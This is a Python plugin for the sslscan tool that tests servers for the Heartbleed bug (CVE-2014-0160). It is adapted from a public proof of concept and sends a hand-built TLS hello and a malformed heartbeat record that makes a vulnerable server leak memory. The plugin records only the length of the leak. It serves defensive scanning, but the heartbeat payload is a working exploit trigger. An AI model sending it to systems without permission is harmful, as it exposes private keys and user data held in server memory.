# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford
# (jspenguin@jspenguin.org)
# https://tools.ietf.org/html/rfc6520

import binascii
import struct
import select
import time

from sslscan import modules
from sslscan.kb import ResultGroup, ResultValue
from sslscan.module.scan import BaseScan


def h2bin(x):
    return binascii.unhexlify(x.replace(" ", "").replace("\n", "").encode("ASCII"))

hello = h2bin("""
16 03 02 00 dc 01 00 00  d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01
""")

hb = h2bin("""
18 03 02 00 03
01 40 00
""")


class VulnerabilityHeartbleed(BaseScan):
    """
    Test if server is vulnerable.

    Test if the heartbleed bug can be used to extract additional server
    information.
    """

    name = "vuln.heartbleed"

    def __init__(self, **kwargs):
        BaseScan.__init__(self, **kwargs)

    def _recv_all(self, conn, length, timeout=5):
        endtime = time.time() + timeout
        rdata = b""
        remain = length
        while remain > 0:
            rtime = endtime - time.time()
            if rtime < 0:
                return None
            r, w, e = select.select([conn], [], [], 5)
            if conn in r:
                data = conn.recv(remain)
                # EOF?
                if not data:
                    return None
                rdata += data
                remain -= len(data)
        return rdata

    def _recv_msg(self, conn):
        hdr = self._recv_all(conn, 5)
        if hdr is None:
            return (None, None, None)
        typ, ver, ln = struct.unpack(">BHH", hdr)
        pay = self._recv_all(conn, ln, 10)
        if pay is None:
            return (None, None, None)
        return(typ, ver, pay)

    def run(self):
        kb = self._scanner.get_knowledge_base()

        kb.set(
            "vulnerability.custom.heartbleed",
            ResultGroup(
                label="Heartbleed(Vulnerability)"
            )
        )

        kb_vuln = ResultValue(
            label="Vulnerable"
        )

        conn = self._scanner.handler.connect()
        conn.send(hello)
        while True:
            typ, ver, payload = self._recv_msg(conn)
            if typ is None:
                kb_vuln.value = False
                kb.set(
                    "vulnerability.custom.heartbleed.vulnerable",
                    kb_vuln
                )
                return

            # Look for server hello done message.
            if typ == 22 and ord(payload[0:1]) == 0x0E:
                break

        conn.send(hb)

        payload = None
        while True:
            typ, ver, payload = self._recv_msg(conn)
            if typ is None:
                kb_vuln.value = False
                break
            if typ == 21:
                kb_vuln.value = False
                break
            if typ == 24:
                kb_vuln.value = True
                break

        kb.set(
            "vulnerability.custom.heartbleed.vulnerable",
            kb_vuln
        )

        kb.set(
            "vulnerability.custom.heartbleed.payload.length",
            ResultValue(
                label="Payload-Length",
                value=len(payload)
            )
        )


modules.register(VulnerabilityHeartbleed)
